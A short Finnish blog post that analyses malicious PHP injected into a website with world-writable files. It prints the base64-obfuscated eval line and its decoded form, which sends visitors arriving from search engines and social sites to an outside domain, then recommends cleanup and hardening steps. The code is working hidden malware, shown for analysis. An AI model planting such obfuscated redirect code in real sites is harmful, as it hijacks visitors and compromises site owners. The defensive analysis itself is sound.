⚈ Kuopassa.net

Lisää kirjoituksia netistä.

Kräkkerin nettisivuille lisäämä koodi

Kirjoitettiin
Päivitettiin 8. kesäkuuta 2014 kello 00.12

Tämä base64-koodattu koodi ilmestyi vuodenvaihteessa eräälle sivustolle, jossa tiedostoilla oli CHMOD-oikeudet 777.

eval(base64_decode("DQplcnJvcl9yZXBvcnRpb
mcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlm
ICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBf
UkVGRVJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdF
TlQnXTsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9y
IHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZW
ZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29n
byIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJp
c3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmV
yZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0Y
SIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3Ry
aXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaX
N0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJl
ciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4X
C5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlci
kgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhL
yIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2U
uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIik
gb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAo
IXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZ
mVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh0
dHA6Ly9uZXcud2lrYWJhLmNvbSIpOw0KCQlleGl0KCk7DQoJfQ0KfQ0K
fQ=="));

Selkokieliseksi muunnettuna viesti kuuluu:

error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or
stristr($referer,"live.com")or stristr($referer,"aport") or
stristr($referer,"nigma") or stristr($referer,"webalta") or
stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or
stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or
preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or
preg_match ("/google\.(.*?)\/url\?sa/",$referer) or
stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or
stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://new.wikaba.com");
exit();
}
}
}

Suosittelin webmasteria deletoimaan haittakoodin saastutetuista tiedostoista, vaihtamaan FTP-tilin, sivuston hallintapaneelin ja tietokannan salasanan, sekä laittamaan rajoitetummat CHMOD-oikeudet tiedostoihin. Mitä muuta voisi tehdä? Ehkä .htaccessin avulla rajoittaa jotain. Jos sinulla on ideoita kuinka välttää tällainen toistumasta, kerro ihmeessä ja kummassa niksisi. Kommentteja otetaan vastaan. :-)

Tagit:

Tietoa kirjoittajasta